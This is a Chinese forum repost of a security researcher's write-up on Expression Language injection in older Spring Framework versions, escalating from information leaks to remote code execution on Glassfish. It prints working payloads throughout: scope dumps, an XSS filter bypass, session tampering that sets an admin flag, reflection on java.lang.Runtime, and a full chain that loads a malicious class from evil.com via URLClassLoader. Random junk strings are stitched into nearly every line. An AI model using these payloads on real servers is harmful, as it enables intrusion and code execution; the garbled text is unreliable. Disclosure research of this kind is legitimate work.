Remote Code with8 _/ n0 v* |/ p7 ]# K6 P v& C
Expression Language Injection2 A- @ t' n `( v, H3 W; k0 Y/ C! q
Spring Framework脆弱性—DanAmodio
5 m* |1 I" N0 @& N$ N/ ~全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
* A j5 e& N' r, G! F/ j可能会存在风险。6 ~) i2 X. [! u2 `4 R. v
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的 l- z4 V. Y1 x3 ~ X U
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可( o3 I% @' J8 `/ p6 I9 ~, u
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
$ M& t R9 n& K5 y以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前% m0 r- s1 J2 g7 j- ]
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
1 I) E2 _1 c9 x: N! @由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但& v- v( s; p3 t1 V% x
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版% `4 m6 {$ d; ^: z& m% {
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
5 [0 i( x, l+ a; Q8 i这些版本不支持禁用double EL resolution.
% y. m7 B1 m' h; \( A3 c9 R这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
/ l1 W4 ]- f+ f3 `EL2.2容器上可能进行远程代码执行。, b) G& v8 v# V4 l. u8 k
这是一个原始信息泄露的攻击例子:
7 P' K+ H: M7 v: y @4 y请求:
4 H. u0 [0 Q1 Bttp://vulnerable.com/foo?message=${applicationScope}
. F' t; i/ i7 \) K$ X到达以下内容页面:
5 _; u; d; d+ b) g* f结果将输出一些包含内部服务器信息calsspath 和本地工作目录1 q+ E( N) B/ C- L+ l+ L4 U5 {
你也可以做一些其他事情,如这样:
% h" L& ]+ Z+ N- a${9999+1}
" r4 w. k7 W* J' v9 T+ q% B8 r还可以访问session 对象和beans- e( K& T R. Y
${employee.lastName}
4 A- q# \0 C" R% b/ @0 G0 ~在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
$ `; s% e# o" W7 W! tEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
" L7 c' U# s0 {& R: e+ ~西,比如XSS.! F6 \8 u9 [- g3 _: o! @, j
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
( H& X0 h. S1 z突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤+ q" n5 R; o8 ]% D `
呢?”" Y; ^- h- ]7 I3 v
因此,我尝试巳缦拢�
& `+ n: w0 u6 x& g ~; ` whttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
& g9 ?7 r) e5 EP& |1 e) G; b) C; E
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返' g' P$ n0 V, A1 W) H
回的文本被插入进了spring:message 标签。7 f; N4 m+ D6 |0 I& }) X
这里是一个最终绕过过滤的实例:& b) \4 R+ ~' E% i
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ% I7 w9 z+ `$ \- j: P7 ^
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
/ d' e) a5 e: O0 Y/ O' @. }5 d什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?5 |8 d0 t }7 D5 i( B J
经过一番研究,我学习到EL2.2 增加了方法调用。
- C0 @1 V/ O9 F9 }" n我写了一个快速测试应用程序代码并且检测一些功能
( t& |% w* t/ k. b${pageContext.request.getSession().setAttribute(“account”,”123456″)}, p: J0 n7 o: ?/ Z
${pageContext.request.getSession().setAttribute(“admin”,true)}
- Q* H9 C$ _* g! {. v/ }! ~好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
3 q. K2 N0 R$ z指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
. \7 `; }/ d( }${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
9 q; e/ p4 a# V& H“, 1234)}$ |* s8 i& S. m3 g I! X* @1 k8 R1 ]
${“”.getClass().forName(“java.lang.Runtime”)}
( j# r) b9 @! `哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
& `+ C. `" X+ P* [! v可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函# D3 q* F- j% t9 Y
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
( _( k% p* B. K4 u一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
( k. b/ }4 C9 @$ @% j方法签名invoke(Object obj, Object„ args)% M* E, G0 Z4 K& e
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
4 K8 B+ r0 G% T2 E* F题,以让它可以工作起来。* b8 I3 U5 l3 W! Z5 c$ v# X
漏洞利用:; `; Z% \6 |6 Z4 d; ]
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我. U" I3 a7 k# g) s
希望你们中的一些JAVA奇才告诉我我是如此的可笑。- q) v8 W' v$ v
这里有一些我试过的失败的用例,为了试图让它工作的用例:
- v( x: x8 c3 S( N$ |+ m 写文件到文件系统" F% h. w6 t, K L6 k, u
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.9 @$ V K$ u, H" r9 m: C
我认为这些可以很好的工作,但是我不能找到合适的类来载入。/ L7 S5 m! d4 k. X
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}' O W0 g- p- g# B4 _/ Q V% x
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:. T# I- ~8 ]1 [( V. D G% N
org.springframework.expression.spel.standard.SpelExpressionParser not found
: \6 D! }9 \) x* Z' I5 Fby7 D5 ]! z( ^' Q$ x
org.glassfish.web.javax.servlet.jsp [194].
! [# N }$ C/ C# Y9 ` 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
8 N I0 L2 e0 Y1 Z 利用反射来创建一个新的Runtime(and watch the world burn) r: I4 d# k4 z3 n! P5 {
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
5 Z/ O/ x2 Z+ i% ^(“java.lang.Runtime”)).getDeclaredConstructors()[0])}( j3 R2 [7 |1 s: X. n# S
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
( I" H+ e6 N/ C# A 使用java.lang.ProcessBuilder
' v" ^: L1 [1 S 用表达式语言来评估表达式语言
& P: G7 X; @' w" GExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
3 _: k) e7 K* \- p${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request# ~: N& Z; k3 d2 a$ s
“,”".getClass(),null)}$ R% G6 B. ~+ k; ^ w
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂); Q7 @& T$ [3 _
我在使用一个空数组通过Method.invoke()时失败了很多次
: a9 @2 w- n# x: T* p“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
6 I3 i5 ^" [, |* g( R1 Z+ U2 D9 C. r, `.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A0 z1 E7 @ f5 v1 z" Q! a
rrayList”).newInstance().toArray())
- L4 B6 W' k( F. H' mjava.lang.IllegalArgumentException: wrong number of arguments
3 S5 W6 u2 u. D3 s! p最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
: _/ R" S- ^4 y$ ?) w; O) F3 L以创建一个恶意class文件并且指向类装载器.+ q; ^ v$ i2 z/ l0 D Y% w
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:! Y- C, W. u" ~& ~ }
public class Malicious {; W) g7 ]* r- s8 p# J* q6 P
public Malicious() {
: N8 ~& H& P+ W( q- j7 htry {: z/ K( h$ Y! Z0 ~6 G
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
9 Q$ X: N' ^ V+ c* {4 A; D1 t, c5 ^java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
! Q0 D" N9 @/ t2 v: K- V3 r} catch (Exception e) {- N( G& F: l. Q# j
}) E9 g) w$ {# R& ~. F, I
}. A: A I1 G9 p6 j# u. Z
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回 h% ]! H' I4 @- ]9 H$ A I
话中,因此它可以被使用.
~, U1 J; W; {7 |${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
/ N" i2 o) t [(“java.util.ArrayList”).newInstance())}
8 A: h* x$ F0 l$ i' TURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建; l6 h- b0 k" v5 g9 y
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
, J* x" o; S! }) \' ~" ^8 pgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
9 F% u! R- ]5 z+ S) J- @: m* r我们可以调用的create(string)方法,然后转换对一个URL对象。6 u6 _0 a0 \' c7 r7 U
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
0 p3 o+ \5 d# H0 U8 t% sere/malicious/classfile/is/located/”).toURL())}# q& t8 J# G# D
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用," B! |! I: S+ q- b
恶意类文件被装载并创建,触发远程代码.
4 Z4 j, |4 `# H1 [! o, c${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte( t, `( | R/ c- r9 I0 U3 k
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
: P7 c4 x: p' s) W# r; H: b4 [getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance% Z& y7 t( \- }
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对